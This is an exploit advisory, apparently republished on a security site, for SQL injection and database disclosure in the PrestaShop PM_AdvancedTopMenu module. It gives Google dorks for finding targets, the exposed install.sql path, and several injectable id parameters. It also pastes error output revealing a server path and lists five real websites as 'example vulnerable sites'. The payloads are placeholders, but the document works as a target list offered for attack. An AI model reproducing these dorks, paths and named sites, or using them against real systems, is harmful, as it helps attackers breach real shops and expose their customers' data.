PrestaShop PM_AdvancedTopMenu Modules 1.4.6.2 Database Disclosure and SQL Injection

2019.01.01
gb KingSkrupellos (GB) gb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:''/modules/pm_advancedtopmenu/''

################################################################################################# # Exploit Title : PrestaShop PM_AdvancedTopMenu Modules 1.4.6.2 Database Disclosure and SQL Injection # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 01/01/2019 # Vendor Homepage : prestashop.com # Software Download Link : presta-module.com/en/3-prestashop-addons/7-appearance/6-advanced-top-menu.html + prestashop.com/forums/topic/89175-module-pm-advancedtopmenu/ + addons.prestashop.com/en/menu/2072-advanced-top-menu-responsive.html # Software Price : 50$ # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.4.10.0 - 1.4.7.0 - 1.4.6.2 # Exploit Risk : Medium # Google Dorks : inurl:''/modules/pm_advancedtopmenu/'' intext:''Hexagone High-Tech se fournit chez'' intext:''création: webncie // © Eight-Racing.com 2013-2014 tous droits réservés'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-89 - [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # PacketStormSecurity Exploit Reference Link : packetstormsecurity.com/files/150907/PrestaShop-PM_AdvancedTopMenu-1.4.6.2-Database-Disclosure-SQL-Injection.html ################################################################################################# # Database Disclosure Exploit : /modules/pm_advancedtopmenu/install.sql # SQL Injection Exploit : /modules/pm_advancedtopmenu/pm_advancedtopmenu.php?id=[SQL Injection] /modules/pm_advancedtopmenu/AdvancedTopMenuClass.php?id=[SQL Injection] /modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php?id=[SQL Injection] /modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php?id=[SQL Injection] ################################################################################################# # Example SQL Database Error => Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules/ pm_advancedtopmenu/pm_advancedtopmenu.php on line 19 Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules /pm_advancedtopmenu/pm_advancedtopmenu.php on line 19 Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules /pm_advancedtopmenu/pm_advancedtopmenu.php on line 20 Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu /AdvancedTopMenuColumnWrapClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 20 Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules /pm_advancedtopmenu/pm_advancedtopmenu.php on line 21 Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu /AdvancedTopMenuColumnClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 21 Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuElementsClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/ modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 22 Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/ AdvancedTopMenuElementsClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 22 Fatal error: Class 'Module' not found in /home/hexago7/public_html/hexagone.mg/modules /pm_advancedtopmenu/pm_advancedtopmenu.php on line 23 Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/hexagone.mg /modules/pm_advancedtopmenu/AdvancedTopMenuClass.php on line 13 Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/hexagone.mg/modules /pm_advancedtopmenu/AdvancedTopMenuColumnClass.php on line 13 Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/hexagone.mg/modules /pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php on line 13 ################################################################################################# # Example Vulnerable Sites => [+] hexagone.mg/modules/pm_advancedtopmenu/install.sql [+] griffin.ch/modules/pm_advancedtopmenu/install.sql [+] eight-racing.com/modules/pm_advancedtopmenu/install.sql [+] domaine-vial.fr/modules/pm_advancedtopmenu/install.sql [+] tecnicamurciana.es/modules/pm_advancedtopmenu/install.sql ################################################################################################# # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top